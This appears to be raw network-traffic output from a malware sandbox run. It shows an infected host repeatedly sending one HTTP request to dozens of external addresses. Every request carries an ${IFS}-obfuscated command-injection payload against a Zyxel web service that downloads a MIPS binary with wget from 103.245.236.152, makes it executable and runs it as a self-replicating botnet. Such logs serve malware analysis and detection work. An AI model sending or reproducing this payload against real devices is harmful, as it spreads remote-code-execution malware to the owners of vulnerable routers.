                                        Jan 14, 2024 16:18:53.674724102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6810192.168.2.1337298187.5.120.157443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.674776077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6811192.168.2.1360396106.120.229.145443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.675236940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6812192.168.2.134165296.85.35.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.678066015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6813192.168.2.1349156206.101.36.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.678726912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6814192.168.2.133473894.127.242.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.678754091 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6815192.168.2.1354946125.168.227.112443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.678793907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6816192.168.2.135621412.136.113.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.678867102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6817192.168.2.1352850114.207.215.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.678908110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6818192.168.2.1360926114.241.60.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.678957939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6819192.168.2.1343898149.4.163.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.678999901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6820192.168.2.1348912106.216.17.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.679078102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6821192.168.2.134598613.152.130.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.679102898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6822192.168.2.133333413.160.182.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.679162025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6823192.168.2.1349178218.94.171.224443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.679209948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6824192.168.2.1355692120.107.47.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.679240942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6825192.168.2.1338978146.224.89.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.679272890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6826192.168.2.1340514195.38.138.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.679301023 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6827192.168.2.1357486149.18.219.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.679341078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6828192.168.2.133391619.177.29.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.679380894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6829192.168.2.134126450.71.75.109443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.679436922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6830192.168.2.135852285.52.32.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.679495096 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6831192.168.2.1340586148.230.131.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.679501057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6832192.168.2.1352114137.122.109.93443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.679537058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6833192.168.2.134870038.142.33.34443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:53.679584026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6834192.168.2.134917266.113.166.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.679862022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6835192.168.2.134241440.220.162.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.679902077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6836192.168.2.1351586170.197.153.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.679948092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6837192.168.2.1350476211.211.30.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.680017948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6838192.168.2.1333140145.43.163.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.680046082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6839192.168.2.1347460184.158.92.7443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.680100918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6840192.168.2.1359480110.65.20.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.680141926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6841192.168.2.1346014202.23.198.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.680161953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6842192.168.2.1356038108.5.134.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.680191040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6843192.168.2.1341558196.189.47.36443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.680255890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6844192.168.2.1342414106.90.40.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.680308104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6845192.168.2.1336372110.149.51.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.680341005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6846192.168.2.1351540202.229.239.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.680388927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6847192.168.2.135466883.11.166.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.680407047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6848192.168.2.1338510201.136.200.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.680444002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6849192.168.2.1335228180.201.119.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.680505037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6850192.168.2.1350236154.180.58.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.680535078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6851192.168.2.134035219.210.198.14443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.680574894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6852192.168.2.1333420190.164.23.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.680613995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6853192.168.2.133891439.94.19.133443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.680628061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6854192.168.2.1343858143.9.159.234443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.680687904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6855192.168.2.1334236162.184.118.179443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.680705070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6856192.168.2.134155676.33.150.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.680738926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6857192.168.2.135390873.247.45.116443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.680787086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6858192.168.2.135831420.7.67.123443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.680838108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6859192.168.2.135703869.192.118.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.680960894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6860192.168.2.133336861.235.21.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.680967093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6861192.168.2.1337456161.95.252.100443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.681001902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6862192.168.2.1348096221.0.191.155443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.681061029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6863192.168.2.134128497.151.143.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.681091070 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6864192.168.2.135717045.91.95.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.681135893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6865192.168.2.1350442176.0.99.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.681185007 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6866192.168.2.13549708.106.150.99443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.681233883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6867192.168.2.134348449.149.217.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.681283951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6868192.168.2.133935644.76.41.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.681344032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6869192.168.2.134428270.117.116.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.681370020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6870192.168.2.1343830139.44.73.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.681418896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6871192.168.2.1341318223.85.153.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:54.681437016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        6872192.168.2.1354148140.91.21.12443
                                        TimestampBytes transferredDirectionData
